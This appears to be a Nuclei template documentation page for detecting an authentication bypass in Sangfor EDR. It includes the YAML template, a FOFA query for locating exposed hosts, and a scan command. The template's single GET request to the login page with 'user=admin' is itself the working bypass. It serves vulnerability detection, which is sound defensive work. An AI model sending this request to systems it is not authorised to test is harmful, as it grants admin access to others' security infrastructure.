Skip to content
Nuclei Templates

Sangfor EDR - Authentication Bypass

ID: sangfor-edr-auth-bypass

Severity: high

Author: princechaddha

Tags: sangfor,auth-bypass,login

Description

Section titled “Description”

Sangfor EDR contains an authentication bypass vulnerability. An attacker can access the system with admin privileges by accessing the login page directly using a provided username rather than going through the login screen without providing a username. This makes it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.

YAML Source

Section titled “YAML Source”
id: sangfor-edr-auth-bypass


info:
  name: Sangfor EDR - Authentication Bypass
  author: princechaddha
  severity: high
  description: |
    Sangfor EDR contains an authentication bypass vulnerability. An attacker can access the system with admin privileges by accessing the login page directly using a provided username rather than going through the login screen without providing a username. This makes it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cwe-id: CWE-287
  metadata:
    max-request: 1
    fofa-query: app="sangfor"
  tags: sangfor,auth-bypass,login


http:
  - method: GET
    path:
      - "{{BaseURL}}/ui/login.php?user=admin"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "/download/edr_installer_"


      - type: word
        part: header
        words:
          - 'Set-Cookie=""'
        negative: true


      - type: word
        part: header
        words:
          - 'Set-Cookie='


      - type: status
        status:
          - 302
# digest: 490a00463044022059c45c8d056ce8186214b85526b226b61fe8d9b3fae3fc2c31d3ec62fa089d040220172783c69e19be6d85739e1e44216d059729a3f2ba0fa7fe15504655aaf34e36:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml"

View on Github